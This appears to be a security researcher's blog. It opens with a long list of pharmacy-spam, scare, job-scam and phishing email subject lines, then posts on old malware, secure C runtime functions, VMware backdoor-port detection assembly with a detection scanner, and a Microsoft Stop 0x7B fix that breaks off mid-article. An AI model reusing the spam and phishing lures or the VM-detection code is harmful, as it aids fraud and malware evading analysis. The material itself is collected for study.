Multiple your pleasure.
Necessary chnages in your xxxlife.
Never lose hope to improve!
Never lose hope to improve!
Never lost hope to cure!
Never lost hope to cure!
New Ichemists at your service.
New products everyday at our chemists.
New products everyday, online chemists where you can find a good source foryour needs.
Night should be full of pleasure.
Nights will be longer than they should be.
No need to visit a doctor again to get medications you need.
No pain, no surgery, 3 months pack will enhance your power for 3 inches.
No painful surgery, get 3 month supply for ultimate enhancing.
Not satisfied with your xliving?
One of the leading online health shops that promote medications.
Online Canadian Chemist - we care about Your Health!
Online Chemists provides you with access to all your health needs from a chemists brand name you know.
Online chemist shop.
Online chemist where you can save on all your health needs.
Online largest selection of medicaments.
Online place to get cheap and free medications.
Online store, providing goods to patients ar discount price.
Only 3 month are required for your ehnancing, and she will notice that.
Only best blue-pills here!
Only best blue-pills here!
Only best medicines here.
Only for your lover.
Only safe medications online.
Or specialists will find the best solution to cure all your health needs.
Order producs for your health and get fee delivery right at your door.
Order with us and save your chemist bills up to 80-90%
Our magic blue colored-tabs will help you to take her to paradise!
Our site contains health information and a wide range of products to suit your health needs
Our store specialization is natural remedy for men and women.
Over 20000 health and beauty products online
Over 20000 products for health and beauty online.
Over 85 medsnames On our Online Store
Own her nights.
Painkiller that makes your sufferings go away.
Patients can access our chemist via the Internet 24/7
Pay less for perfect health.
Perfect ED-solution, known since the roman empire!
Perfect health? Easily.
Perfect lovemaking art 4 you.
Perfect making love is not a joke, read it.
Perfect making love is not a joke, read it.
Perfect solutions to have it hard as stone!
Perfect way to gain more health.
Perform all her desires
Permanent, doctor approved male enhancing products.
Place, where I get cheap meds.
Please, read your health statement.
Pornstarts top secret revealed.
Potence enhancers at their best.
Preapre for positive changes in your life.
Prepare for "hot" summer nights.
Prepare for the crazy olimpic nights.
Presenting you summer nights of pleasure.
Products for yourhealth from certified chemists.
Prolong pleasure with wife.
Prolonge your pleasure at nights.
Proven enhancing secret!
Providing better solution to your health problems.
Purchasing from us can result in much larger savings.
Purchasing online from a Canadian chemists can yield much larger savings
Put her in trembling fire of pleasure.
Put her to sleep.
Put your mate in fire of passion.
Quiet prices for must have products.
Reach new heights of intimate lufe.
Real enhaning products that always work.
Real men do not play with their gf's, they win.
Reasons for falling hard and fast?
Reduce your hair lost.
Regain Or Increase Her Intimate Drive
Regain active love life
Reinvent your love life in just one weekend.
Release your most wild dreams tonight.
Respected Canadian Chemist. Millions of customers cannot be wrong.
Resplendent beauty of young life.
Restore your confidence in bed
Restore your intimte life.
Restore your youth intimate life.
Return wonderful nights of pleasure.
Returned beauty of youth.
Revealing Casanova secrets.
Revealing the secrets of pornstarts!
Rich intimate life easily
Rise fast and stay up longer.
Ruke the ladies hearts!
Safe cure without a doctor.
Safe way to get preparations for your health.
Safest and approved method of male enhancing
Safest and approved method of male enhancing
Satisfy her IMMENSELY
Save more on health products you need, gettin them from online chemists.
Say farewell to ED!
Say goodbuy to bad condition.
Say goodbuy to failures in bed.
Scientific breakthrough in male enhancing.
Search our hot new health and beauty products, plus more online today.
Secret tiny helper for men's potence.
Secret tiny helper for men.
See your love tool growing.
Several steps to masculine power.
Several tips to make your woman happier.
Sharp your pleasure tonight.
She cant forget those nights, when you took blue pilules.
She will be a nughty girl again.
She will be glad if you can keep it up longer.
She will beg you to keep going.
She will give her heart to you for incredible night
She will give her heart to you for incredible nights.
She will give her heart to you.
She will give herself to you.
She will look at you differently.
She will love making love with you.
She will meet you all days with all her love.
She will never stop loving you, because you get medicaments from i-chemists.
She will say you thanks for this!
She will sure like how those pilules enhanced you.
She will want make love with you.
She will want to spend a night with you, buddy.
She wont let you take a break at night.
She wont tell you what works best for you, but we can do it.
Shockin revelation about your love life.
Shop for pilules,perfume,care skin,fragnance,health care,make up,beauty products.
Show her your attention everynight.
Show your sweetheart how much you love her.
Shy of your personal life?
Shy to buy antiEDs at local store? Get them from online Canadian Chemists.
Sick and tired of getting down after intercourse started?
Site for selling top products for health care.
So, how's your personal life these days?
Solve your health problems within a month.
Some helpful information on weight losing products.
Special treatment for your beloved one.
Spend endless nights of pleasure.
Spice up your senses in bed.
Spice up your senses in bed.
Spicy your bedroom life.
Start a new life in your bedroom
Start enjoying your xxxlife!
Start new intimate life from today.
Start protectingyour health right now.
Still cannot satisfy her?
Still wonder, whe she is laughing at you? Bluepilule will improve your nights.
Stole her heart with awnoderful potence ensurer.
Stop destructing your health, we have everything to cover your needs.
Stop dreaming of better intimate life, start having it.
Stop self - destroing and become better day by day.
Stop suffer from bad health, improve it right now.
Strenghth and largeness for you.
Strenghth and power for you.
Summer cut off on weight losing products.
Summer is coming, best time to drop off some kilos.
Summer is on the way, do not forget of all requred-tabs.
Summer sale on health supply.
Super-size dreams come true!
Super-size dreams come true!
Surprising ways to increase your love drive.
Survey of 10 popular male enhancing products.
Sweet deals for health products.
Sweet summer offer , 80% cut on all chemist products.
Take all your health supply online.
Take her to the seventh heaven of pleasure.
Take the blue pilule and she will show you how far the rabbit hole goes.
Take the blue pilule and she will show you how far the rabbit hole goes.
Taking this remedy for a few months will preserve your love tool.
Tastes great, more filling
Ten inches long... and growing
The Best Way to Boost Your Love Life.
The Most serious potence problems now have the solution.
The best intimate experience you've ever had.
The best night of pleasure you ever had.
The best plase for great savings on all your medical needs.
The best time for improvement is summer.
The brand new intimate enhancer, available only at CanadianChemists.
The easiest way to become healthy
The first profitable health shop.
The key to your condition is in your hands.
The largest network of i-chemists.
The lates development in weight losing.
The latest cure for serious male problems.
The latest update in ED treatment.
The most reliable source for cheap and quality health products.
The most reliable source of cheap and quality recovers!
The most reliable source of cheap and quality recovers!
The only chemists with moneyback guarantee.
The trusted online health shop for buying medications online.
The ultimate source of pleasure.
The ways to fine-tune your feelings tonight.
The widest collection of finest meeds online.
The widest e-assrtment of medicaments.
The wonderful xxxfantasy most men have!
The world's largest online health shop.
There is only one way to act longer.
There's a shop for beauty products, pharmacy called Canadian Chemists.
Things for YOU do to keep your loving life spicy.
Think You Know Much About "Intimacy"?
Think abou your ondition today and live longer and happier with our help.
Think about your health.
Thinking about your enhancing?
This blue pilule will make a better man of you.
This could seriously boost your love life.
This health shop will cover all your needs.
This is extremely important for your health.
This is wonderful that you can have perfect intimate life now.
This night she will do everything for you.
This small blue-colored-pill will turn you to supermacho!
This uk online chemist sells cheap quality goods.
This will bring more joy and energy into your intimate life.
This will make your nights unforgetable.
This will put you to sleep, for sure.
Thousand products, helpful to your health.
Time for good xxxlife has come.
Time for perfect enjoyment in bed.
Time for perfect nights with your gf.
Time is pleasure, make it more durable.
Time to be a MAN.
Time to be healthier.
Time to be thinner.
Time to live healthier life.
Tiny help for complete satisfaction.
Tips for Improving Your Love Life
Tips on love making issues
Tips to Keeping your Intimate Life Fun and Active
Tips to better health.
Tips to keeping your intimate life going.
Tips to nights of enjoyment.
Tips to perfect health
Tips to the best lovemaking experince you ever had
Tips to your perfection.
Tired of ED? Get the best treatment on the web.
Tired of been sick and tired, get all you need from our store.
Tired of looking for good chemists, online Canadian chemists is the best solution.
To men who want to act best in bed.
To those who look for perfect health.
Top news on male health
Top news on men improvement.
Top secret of most successful lovers have been discovered.
Touch her heart with your new babymaker.
Treat your male problems and increase your size and drive
Triple your pleasure and benefit from world know pilules.
Trivia question of perfect intimate living.
True way to be manlier.
Turn her dreams into fountain of pleasure.
Turn it to a magic stick of pleasure.
Turn it to a stick of pleasure.
Turn your any night to the night full of pleasure.
Turn your short and tiny stick to something you can be proud of!
Turn yourbedroom into paradise of pleasure.
Twenty-four hour online store with extensive health product information offers prescription filling online for pickup at stores.
US Licensed Health shop, 24h Shipping, NO RX required !
Ultimate pleasure supply, hot nights for 3 months.
Ultimate weight losing solution.
Unbelievable Savings on Medications.
Unbelievably healthy living, come to Canadian Chemists' site to claim it.
Undeliverable pleasure come to claim it.
Ur woman will be happy!
Urgent question of the night.
Urgent! Your health is at stake.
Use it for improving your love life.
Use the medications, everyone is using.
VPXL from Canadian Chemist. Your ultimate enhancing solution.
Vanish illnesses and pain from your life.
Wake up true desire in her.
Wanna be a MachoMan?
Wanna be a tough guy?
Wanna be good looking in two weeks?
Wanna drop few pounds quick?
Wanna have her 5 times a night?
Wanna live happier life?
Want a new boner? Nope, what u need is ablue pill!
Want harder weener that won't let you down soon after beginning?
Want to act in bed, like the guy from the movie you watchd yesterday?
Want to act like a pornstar? Take a bluepill!
Want to act like a pornstar? Take a bluepill!
Want to act like a xxxstart. Here is how.
Want to act like that Ppornstar from the movie u watched yesterday?
Want to be called Macho?
Want to be called Macho?
Want to beat your neighbours in love marathon?
Want to become the master of love making art?
Want to conquer her heart?
Want to forget about bad performance in bed?
Want to get harder and stay up longer? We know how.
Want to have fantastic nights?
Want to have such a tool like famous pornstars do?
Want to keep it up fast and simply? Ask us how.
Want to level up your lovemaking skill?
Want to make love everywhere? Ask us how.
Want to make pleasure more durable?
Want to win her attention?
Waste no time on useless exercise to gett of some kilos, there is better way.
Watch positive changes in your life.
Wave goodbuy to intimate problems
Wave goodbuy to intimate problems
Way to Make Your Night Life Last Longer and Be More Pleasurable.
We always have 40% lower prices fom your order.
We are helping Americans become happy and healthy day by day.
We are helping women boost their intimate relationship.
We are proud to be the largest chemists network all over the world.
We are sure that lengthening will help you boost your intimate life!
We are the first who made quality medications affordble.
We can solve all your intimate problems right now.
We can tell what really works!
We can tell what really works!
We collected best products for your health from all over the world.
We compared 10 most popular antieds, chech the results online.
We have a solution that already helped millions of mn et rid of their male problems.
We have everything to cure most common illnesses.
We have everything to cure your masculinity.
We have everything to make your love more passionate.
We have products for men's, women's and pet's health.
We have the answer how you can improve your health state.
We let all your wishes come true.
We offer a wide selection of the most popular medications online.
We offer the ultimate solution to all your love making problems.
We provide better cure of all your health problems.
We provide better solution than any local chemist.
We provide everything so you can live life to the full.
We provide everything to make your life healthy and perfect.
We provide you with a cost effective, convenient way of shopping for health items online.
We send you medications at half price.
We specialise in medicines & natural health remedies.
We specialise in natural health remedy.
We will fulfill your urgent medical needs.
We will teach you to be the master of making love art.
We'll show you how its possible to have a woman 10 times a day
Weight losing system as it should be.
Weight problems? The solution is near.
What ancients used to treat their bad health.
What can bring you more joy in intimate life?
What doctors dont want you to know.
What it would be like prolonging pleasure for 30 minutes.
What it would be like to have extra 4 inches?
What it would be like, having more health in 4 weeks, with ultimate improving supply?
What makes a stone even harder?
What she will never tell you.
What the doctors dont want you to know.
What to do for more pleasure at night?
What to take for better intimate life.
When travveling abroad, do not forget to put in your pocket on or to blu colored-tabs!
When you are aged and never give up, it gives your he confidence, at any chance , at any place.
When your hot gf is waiting for you, blue pilule will work the best.
When your wife is angry with you at nights
When your wife is angry with you at nights, dont loose hope to have good potence.
When your wife is angry with your bad potence.
Which one of enlarhing products really work?
Who says that wishes cant come true?
Who says that wishes cant come true?
Whole world popular, helping many people.
Why Canadian Chemists is so cheap.
Why control your desires and passion.
Why do you fall so weak and slow?
Why do you fall so weak and slow?
Why doctors will never tell you the easiest way to health.
Why is it falling when u need it up now?
Why is your love life such a disaster?
Why let bad potence spoil your nights.
Why most men cannot satisfy their women.
Why overpay for medications when you can save on them?
Why overpay, when you can save buying products from online chemists.
Why some can make love 7 times a day?
Why some people never let ED spoil their life? Here is their secret.
Why you should control your desire?
Why you should control yourself in bed?
Why your doctor is talking so much about canadian chemists.
Why your doctor is talking so much?
Wide assortment of products for health
Wide assortment of products for your health.
Wide range of enhancing products for boys and girls.
Wild nights lovers choose blue pilule.
Wild nights. 10 reasons to try absolutely new enhancing product.
Will you be able to please her 5 times a night?
Win from benefits of hidden secret of pornstars!
Win your victory in bed
Wiping away shelves with medications this summer.
Wishing to act longer in bed?
With all your faults she loves you still, cause you use right antiEDs.
Women will not tell you what really works, but we do. BLuepill works. Always.
Women will not tell you what really works, but we do. BLuepill works. Always.
Wonderful enhancing effect on your manhood.
Wondering How to Deal with Intimate Problems?
World famous medical products at discount.
World known medicaments at huge discounts.
World largest selection of medical products for men and women.
World of health, 80% cut.
World of pilules, up to 70% cut.
World's most trusted online chemists on the market is now open for you.
Worlds largest selection of male and female enhancing products
Would you like to become her number one?
Would you like to spicy your nights with gf?
XXXstars revealed their secrets.
You always wanted to know, how to prolonge pleasure in bed.
You can feel and act more confident in bed.
You can trust us your health, we know how to improve it.
You dont need luck if you take blue pilules.
You have been awarde an ultimate enhancer.
You have been granted a perfect source of better intimate living.
You have never thought that this could change urlife for better.
You vicory in love.
You were born to become her best lover.
You will know the true feeling of making love.
You wont be humiliated by girls anymore.
You wont disappoint ehr this night.
You wont forget nights after taking antiEDs.
You wont need to worry about your performance in bed anymore.
You'll for sure will be more manly.
Your Health Professional on the Internet.
Your demand for healthier living has been reviewd.
Your direct secret source of perfect xxxlife.
Your every night will be full of passion
Your friends will be amazed with all your chixs!
Your friends will be amazed with all your chixs!
Your good health is our goal.
Your happiness in love is not far away.
Your happy and healthy life is our goal.
Your healh
Your health consultant on Internet.
Your health is in your own hands.
Your health is our store main goal.
Your health wont go wrong.
Your i-health consultant.
Your intimate condition is our specialization.
Your intimate happiness is not far away.
Your intimate life assistant.
Your intimate life helper.
Your intimate source of pleasure.
Your new dedicated chemist shop.
Your new intimate life is awaiting for you.
Your new source of great health.
Your new time spending with your wife.
Your new time spending with your wife.
Your one and only online Chemist.
Your problems will be vanished as well as your weight.
Your recipe for successful intimate living.
Your recipe for successful love
Your recipe for unmatching lofe making.
Your recipe is ready.
Your shy will be vanished along with overweight.
Your supplier of successful lovemaking.
Your wife will notice that for sure.
canadian Chemists, for people who are shy to buy antiEDs at local stores.
hey, have you seen this chemists, that covers all needs?
learn how to make your gf happier.
make love with her easily
quicker,safer,cheaper online chemiststore.
related information.
restore your love life injust a few minutes
we have all the cures to make your life perfect.
who said your wishes cant come true.
you will be crazy lost in love.
your number one potence ensurer!

> FBI and Facebook conspiracy theory spam mail <

F.B.I. Facebook Crime Survey
F.B.I. Facebook Records
F.B.I. Looks Into Facebook
F.B.I. Watching Hezbollah in Facebook
F.B.I. Watching Possible Terrorists on Facebook
F.B.I. agents patrol Facebook
F.B.I. are spying on your Facebook profiles
F.B.I. busts alleged Facebook
F.B.I. bypasses Facebook to nail you
F.B.I. can watch our conversation through Facebook
F.B.I. may strike Facebook
F.B.I. on the Hunt for Facebook users
F.B.I. tries to fight Facebook
F.B.I. wants instant access to Facebook
F.B.I. watching us
F.B.I. watching you
FBI Facebook Crime Survey
FBI Facebook Records
FBI Looks Into Facebook
FBI Watching Hezbollah in Facebook
FBI Watching Possible Terrorists on Facebook
FBI agents patrol Facebook
FBI are spying on your Facebook profiles
FBI busts alleged Facebook
FBI bypasses Facebook to nail you
FBI can watch our conversation through Facebook
FBI may strike Facebook
FBI on the Hunt for Facebook users
FBI tries to fight Facebook
FBI wants instant access to Facebook
FBI watching us
FBI watching you
Facebook Coming Under F.B.I. Scrutiny
Facebook Coming Under FBI Scrutiny
Facebook's F.B.I. ties
Facebook's FBI ties
Get Facebook's F.B.I. Files
Get Facebook's FBI Files
The F.B.I. has a new way of tracking Facebook
The F.B.I.'s plan to "profile" Facebook
The FBI has a new way of tracking Facebook
The FBI's plan to "profile" Facebook

> Non english <

Ingreso adicional para usted! 470 eur por semana.
Necesitamos de los empleados en su ciudad.
Euros adicionales por semana. Trabajo a distancia.
Le proponemos aumentar sus ingresos por la suma de 600 Euros por semana.
Tan solo 54 lugares vacantes . ? Es su oportunidad !
Invitamos a trabajar !
El puesto de trabajo es para usted!
Esta semana 78 puestos!
Quiero ofrecerle el trabajo en la empresa global.
89 del % de las personas no estan satisfechos con sus ingresos. Le ofrecemos una salida.
Le ofrecemos la oportunidad de ganar hasta 800 Euros por semana adicionalmente.
Ha quedado 41 puestos de trabajo en la corporacion global.
Necesitamos empleados en su barrio.
Nuestra propuesta suena interesante para 87% de la poblacion.
Usted necesita + 600 Euros por semana?
Si le interesa un ingreso adicional - no pierda esta oportunidad!
520 eur extra alla settimana. Lavoro a distanza.
Assumiamo in societa in fase di sviluppo.
Guadagni extra! 4500 al mese
Il lavoro in gruppo forte per voi!
Investendo 4 ore alla settimana potete guadagnare 520 Eur.
Molto importante! Questa settimana 73 opportunita d'impiego.
Restano a disposizione rimasti solo 73 posti liberi. Non lasciatevi sfuggire l'occasione!
Ricerchiamo collaboratori in vostra citta.
Vi offriamo la possibilita di incrementare la vostra entrata
Che sia amici si rallegrano che i nemici invidiano!
Chi ha detto, che il studente deve essere povero? Il studente puo` essere ricco!
Come combattere i prezzi che aumentano su alimentari?
Come raggiungere il successo? Stai in compagnia con interessanti persone.
Ditta Sony invita i studenti.
Durante lo studio, si puo` trovare favorevole affare perche sia stato piu` allegro.
Fare buoni cose e guadagnare - e` possibile? Per noi e` importante il Suo parere!
Lei e` all'inizio della grande via? Faccia primo passo.
Nel mondo c'e troppo male male. Faccia giusto atto e ottiene la ricompensa.
Quale studente ha carta Visa di platinocon credito di 50 mila? Il nostro studente lo ha!
Se si puo` iniziare a creare la carriera durante lo studio? Si!
Stufato del lavoro? C'e anche utile affare!
Tra gli esami si puo` non solo studiare pero` anche fare le cose interessanti.
Sichere Arbeitsplatze
Guter, leistungsorientierter Verdienst
Selbststandige Arbeit
Gut bezahlter Job bei freier Zeiteinteilung
Internationale Geschaftskontakte

> Notifications <

Attention - Important Customer Information
Attention - Important Customer Notification
Attention - Important Notification
Attention - Update your account
Auto-Generated Notification
Auto-Generated Notification - Update your account
Auto-Generated Notification - Your account is about to expire
Important Notification
Important Notification - Update your account
Read carefully - Important Customer Information
Read carefully - Important Notification

> Job hiring <

open position
supply manager vacancy
supply manager needed
manager needed

... stay safe guys ...

Thursday, August 21, 2008

File format ...

Reference ....

Microsoft Office Binary (doc, xls, ppt) File Formats

Nothing new ... ;)

Thursday, August 14, 2008

Old virus descriptions

Nothing new ...

just found this old virus description ... LOLz

Other threat names so memorable to me ...




When FakeAlert dates back to 2004 ...

Sunday, July 20, 2008


before it was xpantivirus ... then it became antivirusxp2008


Friday, July 11, 2008

very busy second half of the year ...

some random thoughts ....

* my resignation from PC Tools was effective last week . . .
* started my new job in CA ...

First virus description ....


* we are moving into our new apartment tomorrow . . .
* my wife loved the place because of the huge closets . . .

Tuesday, June 24, 2008

Notes for me .. in case i forgot where to find it ...

When you are searching for something ... you need to have the right keywords for it ...

Like for example I've read a very informative Microsoft TechEd document titled
"Writing Secure Native Code with Visual C++" a couple of years ago.

I'd been searching for a long time ... just to find out that it is not available online ... hehehhe

some excerpt

By default, the older less-secure C runtime functions are declared to be deprecated in the C runtime library header files using the __declspec(deprecated) extended attribute syntax. To turn off the deprecation warnings for the older, less secure functions, you may define the macro _CRT_SECURE_NO_DEPRECATE. Alternatively, you may use the #pragma warning to disable individual warnings.

#pragma warning (disable:4996)

Many of the new C runtime functions check incoming parameters for validity. Parameter validation includes checking for NULL pointers, checking that integral values are within valid ranges, and checking for valid enumeration values. If a problem is detected by the function, an invalid parameter handler is automatically called by the runtime library. The default invalid parameter handler provided by the C runtime raises an Access Violation exception. In Debug mode, an assertion is also raised.

The runtime library provides a function, __set_invalid_parameter_handler so that you may install your own function to respond to input parameter errors. Your function may terminate the application, or it may return control to the calling function that received the invalid parameters. The calling function will normally discontinue execution and set errno to an error code such as EINVAL to indicate invalid parameters. The calling function may use more specific values for errno, such as EBADF to indicate a bad file pointer was detected.
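The handler mechanism from the excerpt, as an added example (not code from the TechEd document): the Visual C++ CRT exports the installer as `_set_invalid_parameter_handler`, with one leading underscore, and a handler that returns makes `strcpy_s` fail with an error code instead of ending the process. The names `count_invalid_parameter`, `install_handler`, `copy_checked` and `invalid_parameter_count` are made up here, and the non-MSVC branch is a small stand-in written for this example so the control flow can be followed with other compilers.

```c
#include <errno.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <wchar.h>

static int g_invalid_calls = 0; /* times the handler has fired */

/* Handler signature required by the Visual C++ CRT. The three strings are
   only filled in by the debug CRT; release builds pass NULL. Returning from
   the handler hands control back to the CRT function, which then fails. */
static void count_invalid_parameter(const wchar_t *expression,
                                    const wchar_t *function,
                                    const wchar_t *file,
                                    unsigned int line, uintptr_t reserved)
{
    (void)expression; (void)function; (void)file; (void)line; (void)reserved;
    g_invalid_calls++;
}

#ifdef _MSC_VER
#include <crtdbg.h>

static void install_handler(void)
{
    _set_invalid_parameter_handler(count_invalid_parameter);
    _CrtSetReportMode(_CRT_ASSERT, 0); /* Debug builds: no assertion dialog */
}

static int copy_checked(char *dst, size_t cap, const char *src)
{
    return strcpy_s(dst, cap, src); /* the real checked CRT function */
}
#else
/* ASSUMPTION: stand-in for compilers without the Visual C++ CRT. It mirrors
   the documented strcpy_s results (EINVAL for NULL pointers, ERANGE when the
   destination is too small) and is not the CRT's implementation. */
typedef void (*invalid_handler_t)(const wchar_t *, const wchar_t *,
                                  const wchar_t *, unsigned int, uintptr_t);
static invalid_handler_t g_handler = NULL;

static void install_handler(void) { g_handler = count_invalid_parameter; }

static int fail(int code)
{
    if (g_handler == NULL)
        abort(); /* stand-in for the default handler: do not continue */
    g_handler(NULL, NULL, NULL, 0, 0);
    errno = code; /* the caller sees the failure in errno and the return value */
    return code;
}

static int copy_checked(char *dst, size_t cap, const char *src)
{
    size_t n;
    if (dst == NULL || cap == 0)
        return fail(EINVAL);
    if (src == NULL) {
        dst[0] = '\0';
        return fail(EINVAL);
    }
    n = strlen(src);
    if (n >= cap) { /* no room for the terminator: refuse, never truncate */
        dst[0] = '\0';
        return fail(ERANGE);
    }
    memcpy(dst, src, n + 1);
    return 0;
}
#endif

int invalid_parameter_count(void) { return g_invalid_calls; }

int main(void)
{
    char buf[8];
    int ok, too_long;

    install_handler();
    ok = copy_checked(buf, sizeof buf, "abc");
    too_long = copy_checked(buf, sizeof buf, "0123456789");
    printf("fits: %d, too long: %d, handler calls: %d\n",
           ok, too_long, invalid_parameter_count());
    return (ok == 0 && too_long == ERANGE && g_invalid_calls == 1) ? 0 : 1;
}
```
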

Another site that I always use for reference is the site below ... for VMWare and Virtual PC detection stuff

/* in Intel syntax (MASM and most Windows based assemblers) */
MOV EAX, 564D5868h /* magic number */
MOV EBX, command-specific-parameter
MOV CX, backdoor-command-number
MOV DX, 5658h /* VMware I/O Port */
IN EAX, DX /* (or OUT DX, EAX) */

/* in AT&T syntax (gnu as and many unix based assemblers) */
movl $0x564D5868, %eax; /* magic number */
movl command-specific-parameter, %ebx;
movw backdoor-command-number, %cx;
movw $0x5658, %dx; /* VMware I/O port */
inl %dx, %eax; (or outl %eax, %dx)
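From the analysis side, the same sequence is a handy indicator that a sample checks for VMware before doing anything else. The scanner below is an added example, not code from the referenced site: it searches a buffer of 32-bit x86 code for the encodings of the three fixed instructions; the function names, the 32-byte window and the sample buffers are assumptions made for the example.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define WINDOW 32 /* ASSUMPTION: max gap in bytes between steps of one probe */

static const uint8_t MOV_EAX_MAGIC[] = {0xB8, 0x68, 0x58, 0x4D, 0x56}; /* mov eax, 564D5868h */
static const uint8_t MOV_DX_PORT[]   = {0x66, 0xBA, 0x58, 0x56};       /* mov dx, 5658h */
static const uint8_t MOV_EDX_PORT[]  = {0xBA, 0x58, 0x56, 0x00, 0x00}; /* mov edx, 5658h */

/* Constructed sample: the sequence from the listing, with zero placeholders
   for the command-specific parameter and the command number. */
static const uint8_t SAMPLE_PROBE[] = {
    0x90, 0x90,                   /* nop; nop                   */
    0xB8, 0x68, 0x58, 0x4D, 0x56, /* mov eax, 564D5868h         */
    0xBB, 0x00, 0x00, 0x00, 0x00, /* mov ebx, 0   (placeholder) */
    0x66, 0xB9, 0x00, 0x00,       /* mov cx, 0    (placeholder) */
    0x66, 0xBA, 0x58, 0x56,       /* mov dx, 5658h              */
    0xED,                         /* in eax, dx                 */
    0xC3                          /* ret                        */
};

/* Constructed sample: loads the constant but never touches the I/O port. */
static const uint8_t SAMPLE_CONSTANT_ONLY[] = {
    0xB8, 0x68, 0x58, 0x4D, 0x56, 0xC3
};

/* First offset in [from, to) where pat starts and fits in buf, or -1. */
static long find_in(const uint8_t *buf, size_t len, size_t from, size_t to,
                    const uint8_t *pat, size_t patlen)
{
    size_t i;
    if (to > len)
        to = len;
    for (i = from; i < to && i + patlen <= len; i++)
        if (memcmp(buf + i, pat, patlen) == 0)
            return (long)i;
    return -1;
}

/* Returns the offset of a "mov eax, magic" that is followed, within WINDOW
   bytes, by a load of 5658h into DX/EDX and then, again within WINDOW bytes,
   by "in eax, dx" (ED) or "out dx, eax" (EF). Returns -1 if there is none. */
long find_vmware_probe(const uint8_t *buf, size_t len)
{
    size_t start = 0;

    for (;;) {
        size_t after_magic, port_end = 0, j;
        long p16, p32;
        long m = find_in(buf, len, start, len,
                         MOV_EAX_MAGIC, sizeof MOV_EAX_MAGIC);
        if (m < 0)
            return -1;
        after_magic = (size_t)m + sizeof MOV_EAX_MAGIC;

        p16 = find_in(buf, len, after_magic, after_magic + WINDOW,
                      MOV_DX_PORT, sizeof MOV_DX_PORT);
        p32 = find_in(buf, len, after_magic, after_magic + WINDOW,
                      MOV_EDX_PORT, sizeof MOV_EDX_PORT);
        if (p16 >= 0 && (p32 < 0 || p16 < p32))
            port_end = (size_t)p16 + sizeof MOV_DX_PORT;
        else if (p32 >= 0)
            port_end = (size_t)p32 + sizeof MOV_EDX_PORT;

        if (port_end != 0)
            for (j = port_end; j < len && j < port_end + WINDOW; j++)
                if (buf[j] == 0xED || buf[j] == 0xEF)
                    return m;

        start = (size_t)m + 1; /* constant without port I/O: keep looking */
    }
}

int main(void)
{
    printf("probe sample:  %ld\n",
           find_vmware_probe(SAMPLE_PROBE, sizeof SAMPLE_PROBE));
    printf("constant only: %ld\n",
           find_vmware_probe(SAMPLE_CONSTANT_ONLY, sizeof SAMPLE_CONSTANT_ONLY));
    return 0;
}
```

A hit is a lead for manual review, not a verdict: compilers can reorder the loads, and the same constant appears in legitimate VMware tooling.
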

and also this one

Wednesday, June 18, 2008

What is so wrong with this? ...

These guys are so desperate .... :(

Well I installed Zango ... and after that all hell breaks loose ... pop ups all you want.

After that I went to rapidshare .. and got this message box ...

At first I thought it came from rapidshare but seeing that small IE box made me suspicious.
(Well it did not come from rapidshare ... )

After I chose Cancel .... Then I am NOT surprised that it STILL ran
(I know it is just an animation ehehhe ... but a normal user may think that it is really running ... and detecting malware on my machine .... so deceiving)

Lucky for me ... I am running in a virtual environment ...

By the way, Boston Celtics are now 2007-2008 NBA Champions

Go Greens!!!

Friday, June 13, 2008

Moving hard disk with Windows XP into another machine

Just another note for me.

When using a mobile rack and your hard drive contains a Windows XP OS, you can follow these instructions so you will not encounter any error when moving it to another machine.

From Micro$oft support ...

I will repost the contents of the URL here in case they remove it from that URL.
This article helped a lot of analysts that I know....


Microsoft support article

You receive a Stop 0x0000007B error after you move the Windows XP system disk to another computer


This article describes how you may receive a Stop error when you try to start the Microsoft Windows XP-based backup computer after you move the system disk to a backup computer. This issue occurs when registry entries and the drivers for the mass storage controller are not installed in Windows XP. To resolve this issue, use the same hardware in the backup computer.


After you move the Microsoft Windows XP system (boot) disk to a backup computer, you may receive the following Stop error when you try to start the Windows XP-based backup computer:
STOP: 0x0000007B (0xF741B84C,0xC0000034,0x00000000,0x00000000)


This error may occur if the registry entries and the drivers for the mass storage controller hardware in the backup computer are not installed in Windows XP.

For integrated device electronics (IDE) controllers, there are several different chip sets available, such as Intel, VIA, and Promise. Each chip set has a different Plug-n-Play identifier (PnP-ID).

The PnP-ID information of mass storage controllers for the backup computer must be in the registry before startup so that Windows XP can initialize the correct drivers.


To resolve this error, use the same hardware for the backup computer:
* Replace the problem hardware components in the backup computer with components of the same manufacturer, make, and model as the motherboard in the computer that you are backing up.
* If the system disk is a SCSI disk, use the same make and model of SCSI controller in the new computer.
* If the system disk is an IDE disk, use the same kind of motherboard in the new computer, a motherboard that has the same kind of IDE chip set and the same PnP-ID as the motherboard in the computer that you are backing up.
For SCSI-based system disks, you can prime the registry and make sure that the drivers that you want are in place by installing the SCSI controller that is used by the backup computer before you transfer the system disk contents. Windows XP PnP detects the controller, sets up critical registry entries, and copies the appropriate driver.

After you see the SCSI controller in Device Manager, you can remove the alternate controller. If you have to move the system disk to another computer that has the same make and model of SCSI controller in the future, Windows XP will start successfully because Windows XP has already used that controller one time and has retained the correct configuration information.


Although Microsoft does not support this method, you can import or merge the required registry entries, and copy the drivers beforehand to support all IDE controllers that are natively supported by Windows XP. Note that although this method might enable the relocated system disk to start successfully, other hardware differences can lead to other problems.

This solution provides support for IDE controllers whose PnP-ID matches one of the PnP-IDs in the following list. However, if you want to determine beforehand the IDE controllers that are used in your current and backup computers, you can search the %SystemRoot%\Setupapi.log file for the PnP-ID that is detected while the Setup program is running.

After you determine the PnP-IDs that are used in your computers, you can choose to merge or to populate the registry with only the PnP-IDs that you need.

The following list shows the PnP-IDs of natively supported IDE controllers in Windows XP:

   ;*********** Standard IDE ATA/ATAPI Controllers *********

;*********** Generic ESDI Hard Disk_Controller **********

;*********** Aztech IDE Controller **********************

;*********** Device ID for Generic Dual PCI IDE *********

;************ALI IDE Controller ******************************

;************Appian Technology **************************

;************CMD Technology *****************************

;************Compaq *************************************

;*************Intel *************************************

;*************PC Technology *****************************

;*************Silicon Integrated System *****************

;*************Symphony Labs *****************************

;*************Promise Technology ************************

;*************VIA Technologies, Inc. ********************

;*************Standard Microsystems Corp. ***************

;*************Toshiba ***********************************

To import this information, follow these steps on two different test computers that exhibit the Stop 0x0000007B error after you change disks between computers. After you follow this procedure on each test computer, you can probably move the hard disks and start both computers without receiving the Stop 0x0000007B error. However, other hardware differences can cause other problems.
1. Copy the following information into Notepad, and then save the file on a 3.5-inch disk. Name the file Mergeide.reg, without the .txt file name extension.

********** Start copy here **********
